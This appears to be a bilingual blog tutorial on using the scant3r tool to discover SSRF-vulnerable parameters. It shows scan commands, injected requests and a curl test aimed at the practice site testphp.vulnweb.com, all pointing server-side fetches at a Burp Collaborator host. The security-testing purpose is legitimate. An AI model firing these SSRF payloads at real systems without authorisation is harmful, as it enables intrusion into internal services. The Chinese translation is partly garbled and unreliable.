how to find ssrf parameters with scant3r

怎么用 scant3r 找到 ssrf 参数

Hello this a small blog about how to find SSRF Parameters in your target by
using scant3r with any http method and JSON Support

你好,这是一个小博客,关于如何找到 SSRF 参数在您的目标使用 scant3r 与任何 http 方法和 JSON 支持

Requirements

要求

  • python 3.6+ 
  • pip 
  • OAST Host (burp collaborator or interactsh.com)

installation

安装

>>> git clone https://github.com/knassar702/scant3r
>>> cd scant3r
>>> pip install -r requirements.txt
>>> ./scant3r.py

                          __ _____     
   ______________ _____  / /|__  /_____
  / ___/ ___/ __ `/ __ \/ __//_ </ ___/
 (__  ) /__/ /_/ / / / / /____/ / /    
/____/\___/\__,_/_/ /_/\__/____/_/ 

[!] Coded by: Khaled Nassar @knassar702
[!] Version: 0.8#Beta

[ERROR][2021-11-11,05:42:48] scant3r -> No Targets 

Usage

用法

now our tool is ready to use , we will use lorsrf module for find SSRF
Parameters via GET,POST methodsbut we need OAST Host , so you can generate one
from your burpsuite or from https://app.interactsh.com/ , and add your host to
scant3r with -x option

现在我们的工具已经可以使用了,我们将使用 lorsrf 模块通过 GET,POST 方法来查找 SSRF 参数,但是我们需要 OAST 主机,所以你可以从你的 burpsuite 或者 https://app.interactsh.com/中生成一个,然后添加你的主机到 scant3r with-x 选项

>>> echo 'http://testphp.vulnweb.com/showimage.php' | ./scant3r.py -m lorsrf -x http://kl9qtqocm9pxhsxwy7x1e9yds4yvmk.burpcollaborator.net -M GET,POST

now scant3r with start add parameters from this list
wordlists/ssrf_parameters.txt via GET,POST methods with your host in the
parameters value

现在 scant3r 和 start add parameters.txt 从列表中添加参数,通过 GET,POST 方法将您的主机添加到参数值

example request

示例请求

GET /api/?test=kl9qtqocm9pxhsxwy7x1e9yds4yvmk.burpcollaborator.net&anotherone=kl9qtqocm9pxhsxwy7x1e9yds4yvmk.burpcollaborator.net
Host: target.com
User-agent: Firefox


POST /api/
Host: target.com
User-agent: Firefox

test=kl9qtqocm9pxhsxwy7x1e9yds4yvmk.burpcollaborator.net&anotherone=kl9qtqocm9pxhsxwy7x1e9yds4yvmk.burpcollaborator.net

Ok , after run the command we got this request

好的,运行命令之后我们得到了这个请求

burpcall

awesome now we found vulnrable parameter but the first quetion you will to
yourself is “How can find the vulnerable parameter ?”, for fix this problem you
can include the informations of the target in your OAST host , How ?
with these varaiables

真棒现在我们发现了 vulnrable 参数,但你会自己的第一个问题是“如何能找到脆弱的参数?”,为了解决这个问题,您可以包括目标的信息在您的 OAST 主机,如何?和这些变种人在一起

  • PATH – the path of scanning (eg /v0.1/api/)
  • PATH-扫描路径(例如/v0.1/api/)
  • HOST – the host of target 主机-目标的主机
  • PARAM – the vulnerable parameter PARAM-易受攻击的参数

just add one of these list in your OAST host via -x option , for example

例如,只需在您的 OAST 主机中通过-x 选项添加其中一个列表即可

target: http://google.com/hackerman/

>>> http://yourhost.com
param=http://yourhost.com

>>> http://yourhost.com%PATH%
param=http://yourhost.com/hackerman/

>>> http://%PARAM%.yourhost.com
param=http://param.yourhost.com

>>> http://yourhost.com/?name=%PARAM%&loc=%PATH%
param=http://yourhost.com/?name=param&loc=/hacerman/

let’s use this

我们用这个

>>> echo 'http://testphp.vulnweb.com/showimage.php' | ./scant3r.py -m lorsrf -x "http://%PARAM%.kl9qtqocm9pxhsxwy7x1e9yds4yvmk.burpcollaborator.net%PATH%" -M GET,POST

and this the request we got 😀

这是我们得到的请求: d

burpcal2

awesome now we have the parameter name file and the path /showimage.php, let’s test it

Awesome 现在我们有了参数 name 文件和 path/showimage.php,让我们测试一下

>>> curl http://testphp.vulnweb.com/showimage.php?file=http://testing.98ffgfb19ycm4hkllwkq1yl2ftll9a.burpcollaborator.net

<html><body>y0sneqpvgkn8wt3rm90cwmzjkgz</body></html>

Worked :D,

工作: d,

for json support you can add this option --json

对于 json 支持,您可以添加这个选项 — json

example :

例如:


>>> echo 'http://testphp.vulnweb.com/showimage.php' | ./scant3r.py -m lorsrf -x "http://%PARAM%.kl9qtqocm9pxhsxwy7x1e9yds4yvmk.burpcollaborator.net%PATH%" -M GET,POST --json

for more help you can (read this wiki
page)[https://github.com/knassar702/scant3r/wiki/lorsrf) and run
>>> ./scant3r.py --help

更多的帮助你可以(阅读这个 wiki https://github.com/knassar702/scant3r/wiki/lorsrf )并运行 > > ./scant3r.py — help

have a nice day
bye 🙂

祝你今天愉快,再见